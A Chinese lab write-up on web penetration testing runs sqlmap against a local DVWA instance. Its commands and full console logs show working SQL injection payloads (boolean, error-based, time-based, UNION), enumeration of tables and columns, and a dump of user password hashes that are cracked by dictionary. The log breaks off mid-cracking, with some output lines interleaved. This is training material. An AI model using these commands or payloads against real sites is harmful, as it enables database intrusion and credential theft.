web渗透测试实战-SQLMAP

这篇具有很好参考价值的文章主要介绍了web渗透测试实战-SQLMAP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、实验项目名称

web渗透测试实战-SQLMAP

二、实验目的及要求

熟悉SQL注入漏洞原理

熟悉SQLMAP工具使用。

1、获取数据库信息:数据库漏洞、数据库名、数据库版本等

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db

your sqlmap version is outdated,Windows网络服务渗透测试实战,安全,web安全

 

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/

2、获取数据库表名

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables

your sqlmap version is outdated,Windows网络服务渗透测试实战,安全,web安全

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/

3、获取数据库指定表的字段

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns

your sqlmap version is outdated,Windows网络服务渗透测试实战,安全,web安全


E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/

4、获取用户名和密码(字段直接逗号隔开)

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump

your sqlmap version is outdated,Windows网络服务渗透测试实战,安全,web安全

your sqlmap version is outdated,Windows网络服务渗透测试实战,安全,web安全文章来源地址https://www.toymoban.com/news/detail-544533.html

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[e99a18c428cb38d5f260853678922e0309:39:12' [INFO] cracked password 'abc123' for hash '
[' for hash '09:39:148d3533d75ae2c3966d7e0d4fcc69216b] ['
[' [09:39:17INFO] [] current status: odrik... /INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7
[] [09:39:18INFO] [] cracked password 'INFOpassword] current status: rootp... |' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:3409:39:34] [] [INFOINFO] current status: arym1... /] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
[09:43:02] [INFO] using suffix '16'
